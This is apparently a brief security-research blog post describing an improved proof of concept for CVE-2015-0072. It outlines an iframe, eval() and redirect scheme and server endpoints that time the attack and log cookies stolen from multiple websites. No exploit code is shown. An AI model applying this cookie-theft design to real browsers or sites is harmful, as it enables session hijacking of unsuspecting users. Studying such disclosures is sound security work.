In the last post I described the CVE-2015-0072 vulnerability and proposed a PoC for sequentialy stealing cookies from multiple websites. The downside is the required time, which is about 5-7 seconds for each website.
Today I improved the PoC, reducing the time necessary for the exploit to work (about 1 second per website).
- if0: iframe sourcing the target websites
- if1: iframe sourcing a local redirector API and executing the blocking script.
- Execution inside if1 of the blocking script. This is done by executing an eval().
- Redirect of the if1 location to the same domain of if0.
IMPROVEMENT: SERVER-SIDE SYNCHRONIZATION
- /r/:rand/:id – Redirect to the target site id. rand is the internal session identifier.
- /d/:rand/:id – Delay the execution for the session rand and the target site id. This API is used to implement the blocking script.
- /l – Log the query parameters (actual cookie stealing).